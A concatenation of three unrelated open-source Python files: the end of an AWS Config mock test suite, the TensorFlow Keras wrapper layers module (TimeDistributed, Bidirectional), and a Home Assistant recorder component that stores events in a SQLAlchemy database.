    rsp_json = json.dumps(new_config_rule, sort_keys=True)
    assert managed_rule_json == rsp_json
@mock_config
def test_describe_config_rules():
    """Test the describe_config_rules API."""
    client = boto3.client("config", region_name=TEST_REGION)
    # No rules exist yet.
    response = client.describe_config_rules()
    assert len(response["ConfigRules"]) == 0
    # Fill the account up to the rule limit.
    rule_name_base = "describe_test"
    for idx in range(ConfigRule.MAX_RULES):
        managed_rule = managed_config_rule()
        managed_rule["ConfigRuleName"] = f"{rule_name_base}_{idx}"
        client.put_config_rule(ConfigRule=managed_rule)
    # One unknown name in the list fails the whole request.
    with pytest.raises(ClientError) as exc:
        client.describe_config_rules(
            ConfigRuleNames=[
                f"{rule_name_base}_1",
                f"{rule_name_base}_10",
                "fooey",
                f"{rule_name_base}_20",
            ]
        )
    err = exc.value.response["Error"]
    assert err["Code"] == "NoSuchConfigRuleException"
    assert "The ConfigRule 'fooey' provided in the request is invalid" in err["Message"]
    # Request three specific ConfigRules.
    response = client.describe_config_rules(
        ConfigRuleNames=[
            f"{rule_name_base}_1",
            f"{rule_name_base}_10",
            f"{rule_name_base}_20",
        ]
    )
    assert len(response["ConfigRules"]) == 3
    # By default, if no ConfigRules are specified, all that can be fit on a
    # "page" will be returned.
    response = client.describe_config_rules()
    assert len(response["ConfigRules"]) == CONFIG_RULE_PAGE_SIZE
    # Test a bad token.
    with pytest.raises(ClientError) as exc:
        client.describe_config_rules(NextToken="foo")
    err = exc.value.response["Error"]
    assert err["Code"] == "InvalidNextTokenException"
    assert "The nextToken provided is invalid" in err["Message"]
    # Loop using tokens, verifying the tokens are as expected.
    expected_tokens = [  # Non-alphanumeric sorted token numbers
        f"{rule_name_base}_120",
        f"{rule_name_base}_143",
        f"{rule_name_base}_31",
        f"{rule_name_base}_54",
        f"{rule_name_base}_77",
        None,
    ]
    idx = 0
    token = f"{rule_name_base}_0"
    # Walk all pages; the final page yields no NextToken (None) and ends
    # the loop.
    while token:
        rsp = client.describe_config_rules(NextToken=token)
        token = rsp.get("NextToken")
        assert token == expected_tokens[idx]
        idx += 1
@mock_config
def test_delete_config_rules():
    """Test the delete_config_rule API."""
    client = boto3.client("config", region_name=TEST_REGION)

    # Register a single rule so there is something to delete.
    rule_name = "test_delete_config_rule"
    rule = managed_config_rule()
    rule["ConfigRuleName"] = rule_name
    client.put_config_rule(ConfigRule=rule)

    # Deleting it should leave no rules behind.
    client.delete_config_rule(ConfigRuleName=rule_name)
    assert client.describe_config_rules()["ConfigRules"] == []

    # A second delete must fail, since the rule no longer exists.
    with pytest.raises(ClientError) as exc:
        client.delete_config_rule(ConfigRuleName=rule_name)
    err = exc.value.response["Error"]
    assert err["Code"] == "NoSuchConfigRuleException"
    assert (
        f"The ConfigRule '{rule_name}' provided in the request is invalid"
        in err["Message"]
    )
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Wrapper layers: layers that augment the functionality of another layer.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras._impl.keras import backend as K
from tensorflow.python.keras._impl.keras.engine import InputSpec
from tensorflow.python.keras._impl.keras.engine import Layer
from tensorflow.python.keras._impl.keras.engine.base_layer import shape_type_conversion
from tensorflow.python.keras._impl.keras.utils.generic_utils import has_arg
from tensorflow.python.layers import utils as tf_layers_util
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.layers.Wrapper')
class Wrapper(Layer):
  """Abstract wrapper base class.
  Wrappers take another layer and augment it in various ways.
  Do not use this class as a layer, it is only an abstract base class.
  Two usable wrappers are the `TimeDistributed` and `Bidirectional` wrappers.
  Arguments:
    layer: The layer to be wrapped.
  """
  def __init__(self, layer, **kwargs):
    self.layer = layer
    # Tracks mapping of Wrapper inputs to inner layer inputs. Useful when
    # the inner layer has update ops that depend on its inputs (as opposed
    # to the inputs to the Wrapper layer).
    self._input_map = {}
    super(Wrapper, self).__init__(**kwargs)
  def build(self, input_shape=None):
    """Mark the wrapper as built; subclasses build the inner layer first."""
    self.built = True
  @property
  def activity_regularizer(self):
    # Delegate to the wrapped layer's regularizer when it defines one.
    if hasattr(self.layer, 'activity_regularizer'):
      return self.layer.activity_regularizer
    else:
      return None
  @property
  def trainable(self):
    # Trainability is owned by the wrapped layer, not the wrapper.
    return self.layer.trainable
  @trainable.setter
  def trainable(self, value):
    self.layer.trainable = value
  @property
  def trainable_weights(self):
    return self.layer.trainable_weights
  @property
  def non_trainable_weights(self):
    return self.layer.non_trainable_weights
  @property
  def updates(self):
    # Combine the inner layer's updates with any the wrapper itself added.
    return self.layer.updates + self._updates
  @property
  def losses(self):
    # Combine the inner layer's losses with any the wrapper itself added.
    return self.layer.losses + self._losses
  def get_weights(self):
    """Return the wrapped layer's weights."""
    return self.layer.get_weights()
  def set_weights(self, weights):
    """Set the wrapped layer's weights."""
    self.layer.set_weights(weights)
  def get_config(self):
    # Serialize the inner layer by class name + config so that
    # `from_config` can rebuild it via layer deserialization.
    config = {
        'layer': {
            'class_name': self.layer.__class__.__name__,
            'config': self.layer.get_config()
        }
    }
    base_config = super(Wrapper, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
  @classmethod
  def from_config(cls, config, custom_objects=None):
    """Rebuild the wrapper, deserializing the inner layer first."""
    from tensorflow.python.keras._impl.keras.layers import deserialize as deserialize_layer  # pylint: disable=g-import-not-at-top
    layer = deserialize_layer(
        config.pop('layer'), custom_objects=custom_objects)
    return cls(layer, **config)
@tf_export('keras.layers.TimeDistributed')
class TimeDistributed(Wrapper):
  """This wrapper allows to apply a layer to every temporal slice of an input.
  The input should be at least 3D, and the dimension of index one
  will be considered to be the temporal dimension.
  Consider a batch of 32 samples,
  where each sample is a sequence of 10 vectors of 16 dimensions.
  The batch input shape of the layer is then `(32, 10, 16)`,
  and the `input_shape`, not including the samples dimension, is `(10, 16)`.
  You can then use `TimeDistributed` to apply a `Dense` layer
  to each of the 10 timesteps, independently:
  ```python
  # as the first layer in a model
  model = Sequential()
  model.add(TimeDistributed(Dense(8), input_shape=(10, 16)))
  # now model.output_shape == (None, 10, 8)
  ```
  The output will then have shape `(32, 10, 8)`.
  In subsequent layers, there is no need for the `input_shape`:
  ```python
  model.add(TimeDistributed(Dense(32)))
  # now model.output_shape == (None, 10, 32)
  ```
  The output will then have shape `(32, 10, 32)`.
  `TimeDistributed` can be used with arbitrary layers, not just `Dense`,
  for instance with a `Conv2D` layer:
  ```python
  model = Sequential()
  model.add(TimeDistributed(Conv2D(64, (3, 3)),
                            input_shape=(10, 299, 299, 3)))
  ```
  Arguments:
    layer: a layer instance.
  """
  def __init__(self, layer, **kwargs):
    super(TimeDistributed, self).__init__(layer, **kwargs)
    self.supports_masking = True
  def build(self, input_shape):
    """Build the inner layer on the per-timestep input shape."""
    input_shape = tensor_shape.TensorShape(input_shape).as_list()
    # Need at least (batch, time, ...) to have a temporal axis to distribute.
    assert len(input_shape) >= 3
    self.input_spec = InputSpec(shape=input_shape)
    # Drop the time dimension (axis 1): this is the shape the wrapped
    # layer sees for a single timestep.
    child_input_shape = [input_shape[0]] + input_shape[2:]
    if not self.layer.built:
      self.layer.build(child_input_shape)
      self.layer.built = True
    super(TimeDistributed, self).build()
    self.built = True
  def compute_output_shape(self, input_shape):
    """Re-insert the time dimension into the inner layer's output shape."""
    input_shape = tensor_shape.TensorShape(input_shape).as_list()
    child_input_shape = tensor_shape.TensorShape([input_shape[0]] +
                                                 input_shape[2:])
    child_output_shape = self.layer.compute_output_shape(
        child_input_shape).as_list()
    timesteps = input_shape[1]
    return tensor_shape.TensorShape([child_output_shape[0], timesteps] +
                                    child_output_shape[1:])
  def call(self, inputs, training=None, mask=None):
    """Apply the wrapped layer to every timestep of `inputs`."""
    kwargs = {}
    if has_arg(self.layer.call, 'training'):
      kwargs['training'] = training
    uses_learning_phase = False  # pylint: disable=redefined-outer-name
    input_shape = K.int_shape(inputs)
    if input_shape[0]:
      # batch size matters, use rnn-based implementation
      def step(x, _):
        global uses_learning_phase  # pylint: disable=global-variable-undefined
        output = self.layer.call(x, **kwargs)
        if hasattr(output, '_uses_learning_phase'):
          uses_learning_phase = (output._uses_learning_phase or
                                 uses_learning_phase)
        return output, []
      # K.rnn iterates `step` over the time axis; no recurrent state is
      # carried (initial_states=[]).
      _, outputs, _ = K.rnn(
          step,
          inputs,
          initial_states=[],
          unroll=False)
      y = outputs
    else:
      # No batch size specified, therefore the layer will be able
      # to process batches of any size.
      # We can go with reshape-based implementation for performance.
      input_length = input_shape[1]
      if not input_length:
        # Dynamic time dimension: read it from the runtime shape.
        input_length = K.shape(inputs)[1]
      # Shape: (num_samples * timesteps, ...). And track the
      # transformation in self._input_map.
      input_uid = tf_layers_util.object_list_uid(inputs)
      inputs = K.reshape(inputs, (-1,) + input_shape[2:])
      self._input_map[input_uid] = inputs
      # (num_samples * timesteps, ...)
      y = self.layer.call(inputs, **kwargs)
      if hasattr(y, '_uses_learning_phase'):
        uses_learning_phase = y._uses_learning_phase
      # Shape: (num_samples, timesteps, ...)
      output_shape = self.compute_output_shape(input_shape).as_list()
      y = K.reshape(y, (-1, input_length) + tuple(output_shape[2:]))
    # Apply activity regularizer if any:
    if (hasattr(self.layer, 'activity_regularizer') and
        self.layer.activity_regularizer is not None):
      regularization_loss = self.layer.activity_regularizer(y)
      self.add_loss(regularization_loss, inputs)
    if uses_learning_phase:
      y._uses_learning_phase = True
    return y
@tf_export('keras.layers.Bidirectional')
class Bidirectional(Wrapper):
  """Bidirectional wrapper for RNNs.
  Arguments:
    layer: `Recurrent` instance.
    merge_mode: Mode by which outputs of the
        forward and backward RNNs will be combined.
        One of {'sum', 'mul', 'concat', 'ave', None}.
        If None, the outputs will not be combined,
        they will be returned as a list.
  Raises:
    ValueError: In case of invalid `merge_mode` argument.
  Examples:
  ```python
  model = Sequential()
  model.add(Bidirectional(LSTM(10, return_sequences=True), input_shape=(5,
  10)))
  model.add(Bidirectional(LSTM(10)))
  model.add(Dense(5))
  model.add(Activation('softmax'))
  model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
  ```
  """
  def __init__(self, layer, merge_mode='concat', weights=None, **kwargs):
    if merge_mode not in ['sum', 'mul', 'ave', 'concat', None]:
      raise ValueError('Invalid merge mode. '
                       'Merge mode should be one of '
                       '{"sum", "mul", "ave", "concat", None}')
    # Forward copy keeps the original direction; the backward copy is
    # rebuilt from config with `go_backwards` inverted.
    self.forward_layer = copy.copy(layer)
    config = layer.get_config()
    config['go_backwards'] = not config['go_backwards']
    self.backward_layer = layer.__class__.from_config(config)
    self.forward_layer._name = 'forward_' + self.forward_layer.name
    self.backward_layer._name = 'backward_' + self.backward_layer.name
    self.merge_mode = merge_mode
    if weights:
      # First half of the weights goes to the forward copy, second half
      # to the backward copy.
      nw = len(weights)
      self.forward_layer.initial_weights = weights[:nw // 2]
      self.backward_layer.initial_weights = weights[nw // 2:]
    self.stateful = layer.stateful
    self.return_sequences = layer.return_sequences
    self.return_state = layer.return_state
    self.supports_masking = True
    self._trainable = True
    super(Bidirectional, self).__init__(layer, **kwargs)
    self.input_spec = layer.input_spec
  @property
  def trainable(self):
    return self._trainable
  @trainable.setter
  def trainable(self, value):
    # Propagate trainability to both directional copies.
    self._trainable = value
    self.forward_layer.trainable = value
    self.backward_layer.trainable = value
  def get_weights(self):
    """Return forward weights followed by backward weights."""
    return self.forward_layer.get_weights() + self.backward_layer.get_weights()
  def set_weights(self, weights):
    """Split `weights` in half between the forward and backward copies."""
    nw = len(weights)
    self.forward_layer.set_weights(weights[:nw // 2])
    self.backward_layer.set_weights(weights[nw // 2:])
  @shape_type_conversion
  def compute_output_shape(self, input_shape):
    """Compute output shape(s), accounting for merge mode and states."""
    output_shape = tuple(self.forward_layer.compute_output_shape(
        input_shape).as_list())
    if self.return_state:
      # First entry is the output; the rest are the state shapes.
      state_shape = output_shape[1:]
      output_shape = output_shape[0]
    if self.merge_mode == 'concat':
      # Concatenation doubles the last (feature) dimension.
      output_shape = list(output_shape)
      output_shape[-1] *= 2
      output_shape = tuple(output_shape)
    elif self.merge_mode is None:
      # Unmerged: one output per direction.
      output_shape = [output_shape, copy.copy(output_shape)]
    if self.return_state:
      if self.merge_mode is None:
        return output_shape + state_shape + copy.copy(state_shape)
      return [output_shape] + state_shape + copy.copy(state_shape)
    return output_shape
  def __call__(self, inputs, initial_state=None, **kwargs):
    """Invoke the layer, splitting `initial_state` between directions."""
    if isinstance(inputs, list):
      # Extra list entries are treated as initial states.
      if len(inputs) > 1:
        initial_state = inputs[1:]
      inputs = inputs[0]
    if initial_state is None:
      return super(Bidirectional, self).__call__(inputs, **kwargs)
    # Standardize `initial_state` into list
    if isinstance(initial_state, tuple):
      initial_state = list(initial_state)
    elif not isinstance(initial_state, list):
      initial_state = [initial_state]
    # Check if `initial_state` can be splitted into half
    num_states = len(initial_state)
    if num_states % 2 > 0:
      raise ValueError(
          'When passing `initial_state` to a Bidirectional RNN, the state '
          'should be a list containing the states of the underlying RNNs. '
          'Found: ' + str(initial_state))
    # Applies the same workaround as in `RNN.__call__`, without handling
    # constants
    kwargs['initial_state'] = initial_state
    additional_inputs = initial_state
    additional_specs = [InputSpec(shape=K.int_shape(state))
                        for state in initial_state]
    # First half of the states feeds the forward layer, second half the
    # backward layer.
    self.forward_layer.state_spec = additional_specs[:num_states // 2]
    self.backward_layer.state_spec = additional_specs[num_states // 2:]
    is_keras_tensor = K.is_keras_tensor(additional_inputs[0])
    for tensor in additional_inputs:
      if K.is_keras_tensor(tensor) != is_keras_tensor:
        raise ValueError('The initial state of a Bidirectional'
                         ' layer cannot be specified with a mix of'
                         ' Keras tensors and non-Keras tensors'
                         ' (a "Keras tensor" is a tensor that was'
                         ' returned by a Keras layer, or by `Input`)')
    if is_keras_tensor:
      # Compute the full input spec, including state
      full_input = [inputs] + additional_inputs
      full_input_spec = self.input_spec + additional_specs
      # Perform the call with temporarily replaced input_spec
      original_input_spec = self.input_spec
      self.input_spec = full_input_spec
      output = super(Bidirectional, self).__call__(full_input, **kwargs)
      self.input_spec = original_input_spec
      return output
    else:
      return super(Bidirectional, self).__call__(inputs, **kwargs)
  def call(self, inputs, training=None, mask=None, initial_state=None):
    """Run both directions and merge their outputs per `merge_mode`."""
    kwargs = {}
    if has_arg(self.layer.call, 'training'):
      kwargs['training'] = training
    if has_arg(self.layer.call, 'mask'):
      kwargs['mask'] = mask
    if initial_state is not None and has_arg(self.layer.call, 'initial_state'):
      # Split states half/half between the two directions.
      forward_state = initial_state[:len(initial_state) // 2]
      backward_state = initial_state[len(initial_state) // 2:]
      y = self.forward_layer.call(inputs, initial_state=forward_state, **kwargs)
      y_rev = self.backward_layer.call(
          inputs, initial_state=backward_state, **kwargs)
    else:
      y = self.forward_layer.call(inputs, **kwargs)
      y_rev = self.backward_layer.call(inputs, **kwargs)
    if self.return_state:
      # Each direction returns [output, state...]; collect the states and
      # keep only the outputs for merging.
      states = y[1:] + y_rev[1:]
      y = y[0]
      y_rev = y_rev[0]
    if self.return_sequences:
      # Re-align the backward sequence with forward time order.
      y_rev = K.reverse(y_rev, 1)
    if self.merge_mode == 'concat':
      output = K.concatenate([y, y_rev])
    elif self.merge_mode == 'sum':
      output = y + y_rev
    elif self.merge_mode == 'ave':
      output = (y + y_rev) / 2
    elif self.merge_mode == 'mul':
      output = y * y_rev
    elif self.merge_mode is None:
      output = [y, y_rev]
    # Properly set learning phase
    if (getattr(y, '_uses_learning_phase', False) or
        getattr(y_rev, '_uses_learning_phase', False)):
      if self.merge_mode is None:
        for out in output:
          out._uses_learning_phase = True
      else:
        output._uses_learning_phase = True
    if self.return_state:
      if self.merge_mode is None:
        return output + states
      return [output] + states
    return output
  def reset_states(self):
    """Reset the recurrent states of both directional copies."""
    self.forward_layer.reset_states()
    self.backward_layer.reset_states()
  def build(self, input_shape):
    """Build both directional copies on the same input shape."""
    with K.name_scope(self.forward_layer.name):
      self.forward_layer.build(input_shape)
    with K.name_scope(self.backward_layer.name):
      self.backward_layer.build(input_shape)
    self.built = True
  def compute_mask(self, inputs, mask):
    """Propagate the mask only when sequences are returned."""
    if self.return_sequences:
      if not self.merge_mode:
        # Unmerged outputs each carry the same mask.
        return [mask, mask]
      else:
        return mask
    else:
      return None
  @property
  def trainable_weights(self):
    if hasattr(self.forward_layer, 'trainable_weights'):
      return (self.forward_layer.trainable_weights +
              self.backward_layer.trainable_weights)
    return []
  @property
  def non_trainable_weights(self):
    if hasattr(self.forward_layer, 'non_trainable_weights'):
      return (self.forward_layer.non_trainable_weights +
              self.backward_layer.non_trainable_weights)
    return []
  @property
  def updates(self):
    if hasattr(self.forward_layer, 'updates'):
      return self.forward_layer.updates + self.backward_layer.updates
    return []
  @property
  def losses(self):
    if hasattr(self.forward_layer, 'losses'):
      return self.forward_layer.losses + self.backward_layer.losses
    return []
  @property
  def constraints(self):
    # Merged constraint dict from both directional copies.
    constraints = {}
    if hasattr(self.forward_layer, 'constraints'):
      constraints.update(self.forward_layer.constraints)
      constraints.update(self.backward_layer.constraints)
    return constraints
  def get_config(self):
    """Serialize `merge_mode` on top of the base Wrapper config."""
    config = {'merge_mode': self.merge_mode}
    base_config = super(Bidirectional, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
| |
"""Support for recording details."""
import asyncio
from collections import namedtuple
import concurrent.futures
from datetime import datetime, timedelta
import logging
import queue
import threading
import time
from typing import Any, Dict, Optional # noqa: F401
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_DOMAINS, CONF_ENTITIES, CONF_EXCLUDE, CONF_INCLUDE,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, MATCH_ALL)
from homeassistant.core import CoreState, HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import generate_filter
from homeassistant.helpers.typing import ConfigType
import homeassistant.util.dt as dt_util
from . import migration, purge
from .const import DATA_INSTANCE
from .util import session_scope
REQUIREMENTS = ['sqlalchemy==1.2.18']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'recorder'
SERVICE_PURGE = 'purge'
# Service-call attributes accepted by the purge service.
ATTR_KEEP_DAYS = 'keep_days'
ATTR_REPACK = 'repack'
SERVICE_PURGE_SCHEMA = vol.Schema({
    vol.Optional(ATTR_KEEP_DAYS): vol.All(vol.Coerce(int), vol.Range(min=0)),
    vol.Optional(ATTR_REPACK, default=False): cv.boolean,
})
# Default database: a SQLite file inside the Home Assistant config dir.
DEFAULT_URL = 'sqlite:///{hass_config_path}'
DEFAULT_DB_FILE = 'home-assistant_v2.db'
CONF_DB_URL = 'db_url'
CONF_PURGE_KEEP_DAYS = 'purge_keep_days'
CONF_PURGE_INTERVAL = 'purge_interval'
CONF_EVENT_TYPES = 'event_types'
# Seconds to wait between database connection/write retries.
CONNECT_RETRY_WAIT = 3
# Include/exclude filter config; only the exclude side supports event types.
FILTER_SCHEMA = vol.Schema({
    vol.Optional(CONF_EXCLUDE, default={}): vol.Schema({
        vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
        vol.Optional(CONF_ENTITIES): cv.entity_ids,
        vol.Optional(CONF_EVENT_TYPES): vol.All(cv.ensure_list, [cv.string]),
    }),
    vol.Optional(CONF_INCLUDE, default={}): vol.Schema({
        vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
        vol.Optional(CONF_ENTITIES): cv.entity_ids,
    })
})
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: FILTER_SCHEMA.extend({
        vol.Optional(CONF_PURGE_KEEP_DAYS, default=10):
            vol.All(vol.Coerce(int), vol.Range(min=1)),
        vol.Optional(CONF_PURGE_INTERVAL, default=1):
            vol.All(vol.Coerce(int), vol.Range(min=0)),
        vol.Optional(CONF_DB_URL): cv.string,
    })
}, extra=vol.ALLOW_EXTRA)
def run_information(hass, point_in_time: Optional[datetime] = None):
    """Return information about current run.

    There is also the run that covers point_in_time.
    """
    from . import models
    instance = hass.data[DATA_INSTANCE]
    # The current run covers anything at or after recording start.
    if point_in_time is None or point_in_time > instance.recording_start:
        return instance.run_info
    runs = models.RecorderRuns
    with session_scope(hass=hass) as session:
        query = session.query(runs).filter(
            (runs.start < point_in_time) & (runs.end > point_in_time))
        result = query.first()
        if result:
            # Detach so the row stays usable after the session closes.
            session.expunge(result)
        return result
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Set up the recorder."""
    conf = config.get(DOMAIN, {})
    # Fall back to the default SQLite file inside the config directory.
    db_url = conf.get(CONF_DB_URL) or DEFAULT_URL.format(
        hass_config_path=hass.config.path(DEFAULT_DB_FILE))
    instance = hass.data[DATA_INSTANCE] = Recorder(
        hass=hass,
        keep_days=conf.get(CONF_PURGE_KEEP_DAYS),
        purge_interval=conf.get(CONF_PURGE_INTERVAL),
        uri=db_url,
        include=conf.get(CONF_INCLUDE, {}),
        exclude=conf.get(CONF_EXCLUDE, {}))
    instance.async_initialize()
    instance.start()

    async def async_handle_purge_service(service):
        """Handle calls to the purge service."""
        instance.do_adhoc_purge(**service.data)

    hass.services.async_register(
        DOMAIN, SERVICE_PURGE, async_handle_purge_service,
        schema=SERVICE_PURGE_SCHEMA)
    # Resolves True/False once the recorder thread connects (or gives up).
    return await instance.async_db_ready
# Queue message telling the recorder thread to purge old data.
PurgeTask = namedtuple('PurgeTask', ['keep_days', 'repack'])
class Recorder(threading.Thread):
"""A threaded recorder class."""
    def __init__(self, hass: HomeAssistant, keep_days: int,
                 purge_interval: int, uri: str,
                 include: Dict, exclude: Dict) -> None:
        """Initialize the recorder."""
        threading.Thread.__init__(self, name='Recorder')
        self.hass = hass
        self.keep_days = keep_days
        self.purge_interval = purge_interval
        # Events are handed from the event loop to this thread via the queue.
        self.queue = queue.Queue()  # type: Any
        self.recording_start = dt_util.utcnow()
        self.db_url = uri
        # Resolved with True/False once the database connection attempt ends.
        self.async_db_ready = asyncio.Future(loop=hass.loop)
        self.engine = None  # type: Any
        self.run_info = None  # type: Any
        # Entity filter built from the include/exclude configuration.
        self.entity_filter = generate_filter(
            include.get(CONF_DOMAINS, []), include.get(CONF_ENTITIES, []),
            exclude.get(CONF_DOMAINS, []), exclude.get(CONF_ENTITIES, []))
        # Event types that should never be recorded.
        self.exclude_t = exclude.get(CONF_EVENT_TYPES, [])
        # Session factory; presumably set up later by _setup_connection --
        # the setup code is outside this view.
        self.get_session = None
    @callback
    def async_initialize(self):
        """Initialize the recorder."""
        # Subscribe to every event; filtering happens in the recorder thread.
        self.hass.bus.async_listen(MATCH_ALL, self.event_listener)
def do_adhoc_purge(self, **kwargs):
"""Trigger an adhoc purge retaining keep_days worth of data."""
keep_days = kwargs.get(ATTR_KEEP_DAYS, self.keep_days)
repack = kwargs.get(ATTR_REPACK)
self.queue.put(PurgeTask(keep_days, repack))
def run(self):
    """Start processing events to save.

    Recorder thread entry point: connect to the database (with
    retries), signal readiness to Home Assistant, optionally schedule
    periodic purges, then consume the event queue until a ``None``
    sentinel arrives.
    """
    from .models import States, Events
    from homeassistant.components import persistent_notification
    from sqlalchemy import exc

    # Retry the initial DB connection up to 10 times before giving up.
    tries = 1
    connected = False
    while not connected and tries <= 10:
        if tries != 1:
            time.sleep(CONNECT_RETRY_WAIT)
        try:
            self._setup_connection()
            migration.migrate_schema(self)
            self._setup_run()
            connected = True
            _LOGGER.debug("Connected to recorder database")
        except Exception as err:  # pylint: disable=broad-except
            _LOGGER.error("Error during connection setup: %s (retrying "
                          "in %s seconds)", err, CONNECT_RETRY_WAIT)
            tries += 1

    if not connected:
        @callback
        def connection_failed():
            """Connect failed tasks."""
            # Resolve the readiness future with failure and surface a
            # persistent notification in the frontend.
            self.async_db_ready.set_result(False)
            persistent_notification.async_create(
                self.hass,
                "The recorder could not start, please check the log",
                "Recorder")

        self.hass.add_job(connection_failed)
        return

    # Sentinel used to distinguish "shutdown before start" from a
    # normal start in the hass_started future below.
    shutdown_task = object()
    hass_started = concurrent.futures.Future()

    @callback
    def register():
        """Post connection initialize."""
        self.async_db_ready.set_result(True)

        def shutdown(event):
            """Shut down the Recorder."""
            if not hass_started.done():
                hass_started.set_result(shutdown_task)
            # None is the queue sentinel that makes the loop below
            # flush, close and exit; then wait for the thread to end.
            self.queue.put(None)
            self.join()

        self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)

        if self.hass.state == CoreState.running:
            hass_started.set_result(None)
        else:
            @callback
            def notify_hass_started(event):
                """Notify that hass has started."""
                hass_started.set_result(None)

            self.hass.bus.async_listen_once(
                EVENT_HOMEASSISTANT_START, notify_hass_started)

    self.hass.add_job(register)
    # Block this thread until Home Assistant has started (or is
    # shutting down).
    result = hass_started.result()

    # If shutdown happened before Home Assistant finished starting
    if result is shutdown_task:
        return

    # Start periodic purge
    if self.keep_days and self.purge_interval:
        @callback
        def async_purge(now):
            """Trigger the purge and schedule the next run."""
            self.queue.put(
                PurgeTask(self.keep_days, repack=False))
            self.hass.helpers.event.async_track_point_in_time(
                async_purge, now + timedelta(days=self.purge_interval))

        # First purge: clamp between "30 minutes from now" (earliest)
        # and "one full interval from now" (latest), based on the age
        # of the oldest stored event.
        earliest = dt_util.utcnow() + timedelta(minutes=30)
        run = latest = dt_util.utcnow() + \
            timedelta(days=self.purge_interval)
        with session_scope(session=self.get_session()) as session:
            event = session.query(Events).first()
            if event is not None:
                session.expunge(event)
                run = dt_util.as_utc(event.time_fired) + timedelta(
                    days=self.keep_days+self.purge_interval)
        run = min(latest, max(run, earliest))

        self.hass.helpers.event.track_point_in_time(async_purge, run)

    # Main consume loop: runs until the None sentinel is received.
    while True:
        event = self.queue.get()

        if event is None:
            self._close_run()
            self._close_connection()
            self.queue.task_done()
            return
        if isinstance(event, PurgeTask):
            purge.purge_old_data(self, event.keep_days, event.repack)
            self.queue.task_done()
            continue
        elif event.event_type == EVENT_TIME_CHANGED:
            # Time ticks are too frequent/noisy to record.
            self.queue.task_done()
            continue
        elif event.event_type in self.exclude_t:
            self.queue.task_done()
            continue

        entity_id = event.data.get(ATTR_ENTITY_ID)
        if entity_id is not None:
            if not self.entity_filter(entity_id):
                self.queue.task_done()
                continue

        # Persist the event (and state change, if any), retrying on
        # transient connectivity errors up to 10 times.
        tries = 1
        updated = False
        while not updated and tries <= 10:
            if tries != 1:
                time.sleep(CONNECT_RETRY_WAIT)
            try:
                with session_scope(session=self.get_session()) as session:
                    try:
                        dbevent = Events.from_event(event)
                        session.add(dbevent)
                        # Flush so dbevent.event_id is assigned before
                        # the state row references it.
                        session.flush()
                    except (TypeError, ValueError):
                        _LOGGER.warning(
                            "Event is not JSON serializable: %s", event)

                    if event.event_type == EVENT_STATE_CHANGED:
                        try:
                            dbstate = States.from_event(event)
                            dbstate.event_id = dbevent.event_id
                            session.add(dbstate)
                        except (TypeError, ValueError):
                            _LOGGER.warning(
                                "State is not JSON serializable: %s",
                                event.data.get('new_state'))

                updated = True
            except exc.OperationalError as err:
                _LOGGER.error("Error in database connectivity: %s. "
                              "(retrying in %s seconds)", err,
                              CONNECT_RETRY_WAIT)
                tries += 1

        if not updated:
            _LOGGER.error("Error in database update. Could not save "
                          "after %d tries. Giving up", tries)

        self.queue.task_done()
@callback
def event_listener(self, event):
    """Listen for new events and put them in the process queue.

    Runs in the event loop; the blocking database work happens on the
    recorder thread, which consumes this queue in run().
    """
    self.queue.put(event)
def block_till_done(self):
    """Block till all events processed.

    Waits until every queued item has been marked task_done by the
    recorder thread. Must not be called from the recorder thread
    itself or it would deadlock.
    """
    self.queue.join()
def _setup_connection(self):
    """Ensure database is ready to fly.

    (Re)creates the SQLAlchemy engine for ``self.db_url``, creates any
    missing tables, and installs a scoped session factory on
    ``self.get_session``.
    """
    from sqlalchemy import create_engine, event
    from sqlalchemy.engine import Engine
    from sqlalchemy.orm import scoped_session
    from sqlalchemy.orm import sessionmaker
    from sqlite3 import Connection

    from . import models

    kwargs = {}

    # pylint: disable=unused-variable
    @event.listens_for(Engine, "connect")
    def set_sqlite_pragma(dbapi_connection, connection_record):
        """Set sqlite's WAL mode."""
        # Only applies to raw sqlite3 connections; WAL lets readers
        # proceed while the recorder thread writes.
        if isinstance(dbapi_connection, Connection):
            old_isolation = dbapi_connection.isolation_level
            dbapi_connection.isolation_level = None
            cursor = dbapi_connection.cursor()
            cursor.execute("PRAGMA journal_mode=WAL")
            cursor.close()
            dbapi_connection.isolation_level = old_isolation

    if self.db_url == 'sqlite://' or ':memory:' in self.db_url:
        # In-memory SQLite: keep one shared connection alive (via
        # StaticPool) and allow cross-thread use, otherwise each new
        # connection would see an empty database.
        from sqlalchemy.pool import StaticPool
        kwargs['connect_args'] = {'check_same_thread': False}
        kwargs['poolclass'] = StaticPool
        kwargs['pool_reset_on_return'] = None
    else:
        kwargs['echo'] = False

    # Dispose of any previous engine (reconnect path) before creating
    # a new one.
    if self.engine is not None:
        self.engine.dispose()

    self.engine = create_engine(self.db_url, **kwargs)
    models.Base.metadata.create_all(self.engine)
    self.get_session = scoped_session(sessionmaker(bind=self.engine))
def _close_connection(self):
    """Close the connection.

    Disposes of the engine's pooled connections and clears the engine
    and session-factory references set by _setup_connection().
    """
    self.engine.dispose()
    self.engine = None
